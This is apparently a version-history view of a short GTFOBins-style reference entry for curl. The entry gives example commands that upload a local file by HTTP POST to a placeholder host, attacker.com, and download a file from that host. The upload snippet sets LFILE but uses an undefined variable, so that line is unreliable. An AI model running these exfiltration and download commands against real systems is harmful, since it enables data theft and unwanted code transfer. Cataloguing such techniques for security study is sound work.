15 lines
395 B
Markdown
Raw Normal View History

2018-05-21 20:14:41 +01:00
---
functions:
upload:
- description: Send local file with an HTTP POST request.
code: |
2018-05-24 20:59:21 +01:00
URL=http://attacker.com/
2018-05-21 20:14:41 +01:00
LFILE=file_to_send
curl -X POST -d @$file_to_send $URL
download:
- description: Fetch a remote file via HTTP GET request.
2018-05-24 20:59:21 +01:00
code: |
URL=http://attacker.com/file_to_get
LFILE=where_to_save
2018-05-21 20:14:41 +01:00
curl $URL -o $LFILE
---